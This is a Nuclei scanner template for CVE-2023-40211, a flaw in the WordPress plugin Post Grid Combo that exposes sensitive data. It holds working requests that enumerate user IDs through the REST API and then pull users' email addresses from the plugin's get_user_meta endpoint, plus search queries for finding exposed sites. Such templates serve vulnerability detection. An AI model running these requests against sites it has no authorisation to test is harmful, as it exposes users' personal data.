漏洞描述
Exposure of Sensitive Information to an Unauthorized Actor vulnerability in PickPlugins Post Grid Combo – 36+ Gutenberg Blocks.This issue affects Post Grid Combo – 36+ Gutenberg Blocks: from n/a through 2.2.50.
id: CVE-2023-40211
info:
name: Post Grid <= 2.2.50 - Information Exposure via REST API
author: daffainfo
severity: high
description: |
Exposure of Sensitive Information to an Unauthorized Actor vulnerability in PickPlugins Post Grid Combo – 36+ Gutenberg Blocks.This issue affects Post Grid Combo – 36+ Gutenberg Blocks: from n/a through 2.2.50.
impact: |
Unauthorized actors can access sensitive information, leading to privacy breaches and potential misuse of data.
remediation: |
Update to the latest version beyond 2.2.50 or apply available security patches.
reference:
- https://patchstack.com/database/vulnerability/post-grid/wordpress-post-grid-combo-plugin-2-2-50-sensitive-data-exposure-vulnerability?_s_id=cve
- https://plugins.trac.wordpress.org/changeset/2947951/post-grid/trunk/src/functions-rest.php
- https://nvd.nist.gov/vuln/detail/CVE-2023-40211
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-40211
epss-score: 0.52755
epss-percentile: 0.97821
cwe-id: CWE-200
cpe: cpe:2.3:a:pickplugins:post_grid_combo:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 3
vendor: pickplugins
product: post_grid_combo
framework: wordpress
fofa-query: body="/wp-content/plugins/post-grid-combo/"
publicwww-query: "/wp-content/plugins/post-grid-combo/"
tags: cve,cve2023,wp,wordpress,wp-plugin,pickplugins,post-grid,vkev
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/{{route}}"
attack: clusterbomb
payloads:
route:
- "wp-json/wp/v2/users"
- "?rest_route=/wp/v2/users"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "application/json")'
- 'contains_all(body, "[{\"id", "name\":")'
condition: and
internal: true
extractors:
- type: json
name: user_id
internal: true
json:
- '.[0].id'
- raw:
- |
POST /wp-json/post-grid/v2/get_user_meta HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"id":{{user_id}},"meta_key":"email"}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{"email":'
- type: word
part: content_type
words:
- application/json
- type: status
status:
- 200
# digest: 4b0a00483046022100dbc6114d16521f3076e9455ddd18385910dbad3a6bcf3636699a7add9e379b95022100de92fe85a3cb201ef8fa812a9a6a624a69955477fbeb901b9301ba73ced87c33:922c64590222798bb761d5b6d8e72950